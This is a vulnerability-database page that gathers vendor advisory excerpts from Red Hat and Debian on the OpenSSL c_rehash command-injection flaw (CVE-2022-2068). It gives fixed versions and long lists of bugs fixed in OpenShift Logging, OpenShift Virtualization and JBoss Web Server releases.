Search criteria Use full-text search for keyword queries.
Combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by dates instead of relevance.

42 vulnerabilities found for sannav by broadcom

VAR-202206-1428

Vulnerability from variot - Updated: 2026-03-09 20:23

In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze). (CVE-2022-2068). Description:

Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.

Space precludes documenting all of these changes in this advisory. Bugs fixed (https://bugzilla.redhat.com/):

2031228 - CVE-2021-43813 grafana: directory traversal vulnerability 2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources 2115198 - build ceph containers for RHCS 5.2 release

For the oldstable distribution (buster), this problem has been fixed in version 1.1.1n-0+deb10u3.

For the stable distribution (bullseye), this problem has been fixed in version 1.1.1n-0+deb11u3.

We recommend that you upgrade your openssl packages.

For the detailed security status of openssl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmK4pF0ACgkQEMKTtsN8 TjYP5g//SyfB1W/vUNmgeSp2kKu3vt9CPwoXMK8nhTcA7iYhkxIJTFxAWDpn+4S7 W4kYyxMRFSIHKv4FLiLgi/Vzn4g1kB1UvKv05CFhEJqpWMyyRj6FdmebLlkLG0eE IGsZoQl9be+lRJ+E4oMMkrRkbJV5II7s69vdxFDh4893Ndx05GWWvXT5Doc5gFMi NoNabBH47GFU6aGDwVJU+xooBT6s4QMOrgVKYbxhM5PO98HQzk0zv0Z6YRx7FzKD hYMN/t6A8qj4zMQqJqM+44q9zpDryyolGLewvgOit1HFFnLlBf4wsdBvE7AGhvGs Lam5OXLhlwlQT6gBNd4XFAShdEZGLVF2DCgKzMh5cG5r2W10ewfHHyOR4CnkMQQP ePA8YvhVwSH3I5jOTS75A18LXpoRJKRXQuQ7v9di2C8qRZ0qnM95h0KzH9/UKyUc TmF09MTKWoFCkCtyzucdPnoyUPhdScJc08jcGJ37MCb8uKI4F5jVImLnHC6qS6Oc Gab3OPIDzS8I1rro0J1k8RJE1E8XvfCxgVAOoebn0mst8qT+38hqsTFykG+uq3dN sfhwI+E8iOeVOapyDVzxz8DfIkyBdnFsM4cg9VxDPOOllN+BknySqvzxu+aYpMFz K/D6g421XIIXPXD+sP/w1ENPV7LFobRR7KXUWvjS5l/Ir8dhPdQ= =tiWq -----END PGP SIGNATURE----- .

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Description:

Logging Subsystem 5.5.0 - Red Hat OpenShift

Security Fix(es):

  • kubeclient: kubeconfig parsing error can lead to MITM attacks (CVE-2022-0759)

  • golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

  • golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)

  • prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

  1. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter 2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-1415 - Allow users to tune fluentd LOG-1539 - Events and CLO csv are not collected after running oc adm must-gather --image=$downstream-clo-image LOG-1713 - Reduce Permissions granted for prometheus-k8s service account LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created. LOG-2134 - The infra logs are sent to app-xx indices LOG-2159 - Cluster Logging Pods in CrashLoopBackOff LOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages. LOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL LOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext. LOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not be collected. LOG-2242 - Log file metric exporter is still following /var/log/containers files. LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed LOG-2264 - Logging link should contain an icon LOG-2274 - [Logging 5.5] EO doesn't recreate secrets kibana and kibana-proxy after removing them. LOG-2276 - Fluent config format is hard to read via configmap LOG-2290 - ClusterLogging Instance status in not getting updated in UI LOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1 LOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint. LOG-2300 - [Logging 5.5]ES pods can't be ready after removing secret/signing-elasticsearch LOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously LOG-2333 - Journal logs not reaching Elasticsearch output LOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record. LOG-2342 - [Logging 5.5] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority" LOG-2384 - Provide a method to get authenticated from GCP LOG-2411 - [Vector] Audit logs forwarding not working. LOG-2412 - CLO's loki output url is parsed wrongly LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type LOG-2418 - EO supported time units don't match the units specified in CRDs. LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong LOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift LOG-2444 - The write index is removed when the size of the index > diskThresholdPercent% * total size. LOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster. LOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack. LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5] LOG-2522 - CLO supported time units don't match the units specified in CRDs. LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready. LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster LOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector. LOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated. LOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate LOG-2599 - Supported values for level field don't match documentation LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect LOG-2619 - containers violate PodSecurity -- Log Exporation LOG-2627 - containers violate PodSecurity -- Loki LOG-2649 - Level Critical should match the beginning of the line as the other levels LOG-2656 - Logging uses deprecated v1beta1 apis LOG-2664 - Deprecated Feature logs causing too much noise LOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster LOG-2693 - Integration with Jaeger fails for ServiceMonitor LOG-2700 - [Vector] vector container can't start due to "unknown field pod_annotation_fields" . LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance LOG-2725 - Upgrade logging-eventrouter Golang version and tags LOG-2731 - CLO keeps reporting Reconcile ServiceMonitor retry error and Reconcile Service retry error after creating clusterlogging. LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration LOG-2742 - unrecognized outputs when use the sts role secret LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active_primary" instead of "active" shards. LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo LOG-2763 - [Vector]{Master} Vector's healthcheck fails when forwarding logs to Lokistack. LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image LOG-2765 - ingester pod can not be started in IPv6 cluster LOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy LOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx LOG-2773 - No cluster-logging-operator-metrics service in logging 5.5 LOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack. LOG-2784 - Japanese log messages are garbled at Kibana LOG-2793 - [Vector] OVN audit logs are missing the level field. LOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF LOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF. LOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector. LOG-2875 - Seeing a black rectangle box on the graph in Logs view LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error LOG-2877 - When there is no query entered, seeing error message on the Logs view LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen

  1. References:

https://access.redhat.com/security/cve/CVE-2021-38561 https://access.redhat.com/security/cve/CVE-2022-0759 https://access.redhat.com/security/cve/CVE-2022-1012 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1785 https://access.redhat.com/security/cve/CVE-2022-1897 https://access.redhat.com/security/cve/CVE-2022-1927 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-21698 https://access.redhat.com/security/cve/CVE-2022-30631 https://access.redhat.com/security/cve/CVE-2022-32250 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc. Summary:

Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.

RHEL-8-CNV-4.12

============= bridge-marker-container-v4.12.0-24 cluster-network-addons-operator-container-v4.12.0-24 cnv-containernetworking-plugins-container-v4.12.0-24 cnv-must-gather-container-v4.12.0-58 hco-bundle-registry-container-v4.12.0-769 hostpath-csi-driver-container-v4.12.0-30 hostpath-provisioner-container-v4.12.0-30 hostpath-provisioner-operator-container-v4.12.0-31 hyperconverged-cluster-operator-container-v4.12.0-96 hyperconverged-cluster-webhook-container-v4.12.0-96 kubemacpool-container-v4.12.0-24 kubevirt-console-plugin-container-v4.12.0-182 kubevirt-ssp-operator-container-v4.12.0-64 kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55 kubevirt-tekton-tasks-copy-template-container-v4.12.0-55 kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55 kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55 kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55 kubevirt-tekton-tasks-operator-container-v4.12.0-40 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55 kubevirt-template-validator-container-v4.12.0-32 libguestfs-tools-container-v4.12.0-255 ovs-cni-marker-container-v4.12.0-24 ovs-cni-plugin-container-v4.12.0-24 virt-api-container-v4.12.0-255 virt-artifacts-server-container-v4.12.0-255 virt-cdi-apiserver-container-v4.12.0-72 virt-cdi-cloner-container-v4.12.0-72 virt-cdi-controller-container-v4.12.0-72 virt-cdi-importer-container-v4.12.0-72 virt-cdi-operator-container-v4.12.0-72 virt-cdi-uploadproxy-container-v4.12.0-71 virt-cdi-uploadserver-container-v4.12.0-72 virt-controller-container-v4.12.0-255 virt-exportproxy-container-v4.12.0-255 virt-exportserver-container-v4.12.0-255 virt-handler-container-v4.12.0-255 virt-launcher-container-v4.12.0-255 virt-operator-container-v4.12.0-255 virtio-win-container-v4.12.0-10 vm-network-latency-checkup-container-v4.12.0-89

  1. Bugs fixed (https://bugzilla.redhat.com/):

1719190 - Unable to cancel live-migration if virt-launcher pod in pending state 2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume 2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache 2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error 2040377 - Unable to delete failed VMIM after VM deleted 2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed 2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value 2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements 2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString 2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control 2060499 - [RFE] Cannot add additional service (or other objects) to VM template 2069098 - Large scale |VMs migration is slow due to low migration parallelism 2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass 2071491 - Storage Throughput metrics are incorrect in Overview 2072797 - Metrics in Virtualization -> Overview period is not clear or configurable 2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers 2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group 2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode 2086551 - Min CPU feature found in labels 2087724 - Default template show no boot source even there are auto-upload boot sources 2088129 - [SSP] webhook does not comply with restricted security context 2088464 - [CDI] cdi-deployment does not comply with restricted security context 2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR 2089744 - HCO should label its control plane namespace to admit pods at privileged security level 2089751 - 4.12.0 containers 2089804 - 4.12.0 rpms 2091856 - ?Edit BootSource? action should have more explicit information when disabled 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer 2093771 - The disk source should be PVC if the template has no auto-update boot source 2093996 - kubectl get vmi API should always return primary interface if exist 2094202 - Cloud-init username field should have hint 2096285 - KubeVirt CR API documentation is missing docs for many fields 2096780 - [RFE] Add ssh-key and sysprep to template scripts tab 2097436 - Online disk expansion ignores filesystem overhead change 2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP 2099556 - [RFE] Add option to enable RDP service for windows vm 2099573 - [RFE] Improve template's message about not editable 2099923 - [RFE] Merge "SSH access" and "SSH command" into one 2100290 - Error is not dismissed on catalog review page 2100436 - VM list filtering ignores VMs in error-states 2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 2100629 - Update nested support KBASE article 2100679 - The number of hardware devices is not correct in vm overview tab 2100682 - All hardware devices get deleted while just delete one 2100684 - Workload profile are not editable during creation and after creation 2101144 - VM filter has two "Other" checkboxes which are triggered together 2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode 2101167 - Edit buttons clickable area is too large. 2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id 2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state 2101390 - Easy to miss the "tick" when adding GPU device to vm via UI 2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id 2101423 - wrong user name on using ignition 2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page 2101445 - "Pending changes - Boot Order" 2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user 2101499 - Cannot add NIC to VM template as non-priv user 2101501 - NAME parameter in VM template has no effect. 2101628 - non-priv user cannot load dataSource while edit template's rootdisk 2101667 - VMI view is not aligned with vm and tempates 2101681 - All templates are labeling "source available" in template list page 2102074 - VM Creation time on VM Overview Details card lacks string 2102125 - vm clone modal is displaying DV size instead of PVC size 2102132 - align the utilization card of single VM overview with the design 2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"? 2102256 - Add button moved to right 2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal 2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other' 2102561 - sysprep-info should link to downstream doc 2102737 - Clone a VM should lead to vm overview tab 2102740 - "Save" button on vm clone modal should be "Clone" 2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab 2103807 - PVC is not named by VM name while creating vm quickly 2103817 - Workload profile values in vm details should align with template's value 2103844 - VM nic model is empty 2104331 - VM list page scroll up automatically 2104402 - VM create button is not enabled while adding multiple environment disks 2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed 2104424 - Enable descheduler or hide it on template's scheduling tab 2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted 2104480 - Alerts in VM overview tab disappeared after a few seconds 2104785 - "Add disk" and "Disks" are on the same line 2104859 - [RFE] Add "Copy SSH command" to VM action list 2105257 - Can't set log verbosity level for virt-operator pod 2106175 - All pages are crashed after visit Virtualization -> Overview 2106963 - Cannot add configmap for windows VM 2107279 - VM Template's bootable disk can be marked as bootable 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read 2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header 2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse functions 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working 2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob 2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode 2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip 2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal 2108339 - datasource does not provide timestamp when updated 2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed 2109818 - Upstream metrics documentation is not detailed enough 2109975 - DataVolume fails to import "cirros-container-disk-demo" image 2110256 - Storage -> PVC -> upload data, does not support source reference 2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls 2111240 - GiB changes to B in Template's Edit boot source reference modal 2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics 2111328 - kubevirt plugin console crashed after visit vmi page 2111378 - VM SSH command generated by UI points at api VIP 2111744 - Cloned template should not label app.kubernetes.io/name: common-templates 2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi) 2112900 - button style are different 2114516 - Nothing happens after clicking on Fedora cloud image list link 2114636 - The style of displayed items are not unified on VM tabs 2114683 - VM overview tab is crashed just after the vm is created 2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12 2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass 2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items 2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates 2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF' 2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found" 2117549 - Cannot edit cloud-init data after add ssh key 2117803 - Cannot edit ssh even vm is stopped 2117813 - Improve descriptive text of VM details while VM is off 2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs 2118257 - outdated doc link tolerations modal 2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format 2119069 - Unable to start windows VMs on PSI setups 2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 2119309 - readinessProbe in VM stays on failed 2119615 - Change the disk size causes the unit changed 2120907 - Cannot filter disks by label 2121320 - Negative values in migration metrics 2122236 - Failing to delete HCO with SSP sticking around 2122990 - VMExport should check APIGroup 2124147 - "ReadOnlyMany" should not be added to supported values in memory dump 2124307 - Ui crash/stuck on loading when trying to detach disk on a VM 2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it 2124555 - View documentation link on MigrationPolicies page des not work 2124557 - MigrationPolicy description is not displayed on Details page 2124558 - Non-privileged user can start MigrationPolicy creation 2124565 - Deleted DataSource reappears in list 2124572 - First annotation can not be added to DataSource 2124582 - Filtering VMs by OS does not work 2124594 - Docker URL validation is inconsistent over application 2124597 - Wrong case in Create DataSource menu 2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile 2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state 2127787 - Expose the PVC source of the dataSource on UI 2127843 - UI crashed by selecting "Live migration network" 2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes 2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer 2128002 - Error after VM template deletion 2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards 2128872 - [4.11]Can't restore cloned VM 2128948 - Cannot create DataSource from default YAML 2128949 - Cannot create MigrationPolicy from example YAML 2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 2129013 - Mark Windows 11 as TechPreview 2129234 - Service is not deleted along with the VM when the VM is created from a template with service 2129301 - Cloud-init network data don't wipe out on uncheck checkbox 'Add network data' 2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook 2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV 2130588 - crypto-policy : Common Ciphers support by apiserver and hco 2130695 - crypto-policy : Logging Improvement and publish the source of ciphers 2130909 - Non-privileged user can start DataSource creation 2131157 - KV data transfer rate chart in VM Metrics tab is not displayed 2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough 2131674 - Bump virtlogd memory requirement to 20Mi 2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11 2132682 - Default YAML entity name convention. 2132721 - Delete dialogs 2132744 - Description text is missing in Live Migrations section 2132746 - Background is broken in Virtualization Monitoring page 2132783 - VM can not be created from Template with edited boot source 2132793 - Edited Template BSR is not saved 2132932 - Typo in PVC size units menu 2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed 2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed 2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed 2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed 2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed 2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed 2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed 2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed 2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod 2134672 - [e2e] add data-test-id for catalog -> storage section 2134825 - Authorization for expand-spec endpoint missing 2135805 - Windows 2022 template is missing vTPM and UEFI params in spec 2136051 - Name jumping when trying to create a VM with source from catalog 2136425 - Windows 11 is detected as Windows 10 2136534 - Not possible to specify a TTL on VMExports 2137123 - VMExport: export pod is not PSA complaint 2137241 - Checkbox about delete vm disks is not loaded while deleting VM 2137243 - registery input add docker prefix twice 2137349 - "Manage source" action infinitely loading on DataImportCron details page 2137591 - Inconsistent dialog headings/titles 2137731 - Link of VM status in overview is not working 2137733 - No link for VMs in error status in "VirtualMachine statuses" card 2137736 - The column name "MigrationPolicy name" can just be "Name" 2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly 2138112 - Unsupported S3 endpoint option in Add disk modal 2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals 2138199 - Win11 and Win22 templates are not filtered properly by Template provider 2138653 - Saving Template prameters reloads the page 2138657 - Setting DATA_SOURCE_ Template parameters makes VM creation fail 2138664 - VM that was created with SSH key fails to start 2139257 - Cannot add disk via "Using an existing PVC" 2139260 - Clone button is disabled while VM is running 2139293 - Non-admin user cannot load VM list page 2139296 - Non-admin cannot load MigrationPolicies page 2139299 - No auto-generated VM name while creating VM by non-admin user 2139306 - Non-admin cannot create VM via customize mode 2139479 - virtualization overview crashes for non-priv user 2139574 - VM name gets "emptyname" if click the create button quickly 2139651 - non-priv user can click create when have no permissions 2139687 - catalog shows template list for non-priv users 2139738 - [4.12]Can't restore cloned VM 2139820 - non-priv user cant reach vm details 2140117 - Provide upgrade path from 4.11.1->4.12.0 2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project 2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user 2140627 - Not able to select storageClass if there is no default storageclass defined 2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user 2140808 - Hyperv feature set to "enabled: false" prevents scheduling 2140977 - Alerts number is not correct on Virtualization overview 2140982 - The base template of cloned template is "Not available" 2140998 - Incorrect information shows in overview page per namespace 2141089 - Unable to upload boot images. 2141302 - Unhealthy states alerts and state metrics are missing 2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations 2141494 - "Start in pause mode" option is not available while creating the VM 2141654 - warning log appearing on VMs: found no SR-IOV networks 2141711 - Node column selector is redundant for non-priv user 2142468 - VM action "Stop" should not be disabled when VM in pause state 2142470 - Delete a VM or template from all projects leads to 404 error 2142511 - Enhance alerts card in overview 2142647 - Error after MigrationPolicy deletion 2142891 - VM latency checkup: Failed to create the checkup's Job 2142929 - Permission denied when try get instancestypes 2143268 - Topolvm storageProfile missing accessModes and volumeMode 2143498 - Could not load template while creating VM from catalog 2143964 - Could not load template while creating VM from catalog 2144580 - "?" icon is too big in VM Template Disk tab 2144828 - "?" icon is too big in VM Template Disk tab 2144839 - Alerts number is not correct on Virtualization overview 2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten 2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container

  1. Description:

Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References.

The References section of this erratum contains a download link for the update. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.

Security Fix(es):

  • libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)
  • libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
  • expat: a use-after-free in the doContent function in xmlparse.c (CVE-2022-40674)
  • zlib: a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field (CVE-2022-37434)
  • curl: HSTS bypass via IDN (CVE-2022-42916)
  • curl: HTTP proxy double-free (CVE-2022-42915)
  • curl: POST following PUT confusion (CVE-2022-32221)
  • httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)
  • httpd: mod_sed: DoS vulnerability (CVE-2022-30522)
  • httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)
  • httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)
  • httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)
  • curl: control code in cookie denial of service (CVE-2022-35252)
  • zlib: a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field (CVE-2022-37434)
  • jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)
  • curl: Unpreserved file permissions (CVE-2022-32207)
  • curl: various flaws (CVE-2022-32206 CVE-2022-32208)
  • openssl: the c_rehash script allows command injection (CVE-2022-2068)
  • openssl: c_rehash script allows command injection (CVE-2022-1292)
  • jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721)
  • jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):

